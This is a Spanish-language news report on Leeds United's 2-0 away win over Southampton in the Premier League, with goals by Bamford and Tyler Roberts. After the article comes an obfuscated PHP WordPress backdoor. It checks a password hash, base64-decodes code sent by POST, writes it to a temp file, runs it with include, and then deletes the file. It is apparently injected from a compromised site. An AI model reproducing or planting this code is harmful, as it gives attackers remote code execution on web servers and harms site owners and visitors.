El Leeds United de Marcelo Bielsa volvió a ganar y refuerza su buena temporada

Leeds United superó a Southampton 2 a 0, como visitante, por la anteúltima fecha de la Premier League para sumar su tercer triunfo en fila y ratificar su buena temporada en el regreso a la máxima categoría del fútbol inglés. Y aunque es bastante complicado, le queda un mínima chance matemática de clasificar a Europa League.

Al principio la pasó bastante mal el equipo de Marcelo Bielsa. Antes de los 5 minutos, el arquero Kiko Casilla tuvo dos intervenciones espectaculares para evitar la caída de su arco. Ese asedio constante de Southampton -que contó con la presencia de sus hinchas- se extendió durante el cuarto de hora inicial.

Con el paso de los minutos, Leeds -que quedó octavo en la tabla- lo fue emparejando. Y celebró con la definición de Patrick Bamford -anotando su gol número 16 de la temporada- recibiendo un pase largo en el área chica y colocando su pierna izquierda para hacer pasar la pelota entre las piernas del arquero McCarthy, a los 28 minutos del segundo tiempo.

En los instantes finales con Southampton presionando arriba y Leeds United buscando fulminar de contragolpe, sucedió lo último. Mayoría de atacantes visitantes, remate de Bamford, tapada de McCarthy y Tyler Roberts atento para recibir el rebote y definir, en el cuarto minuto de descuento.

El equipo de Bielsa recibirá el domingo, a las 12 hora argentina, a Albion por la última fecha de esta Premier League.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}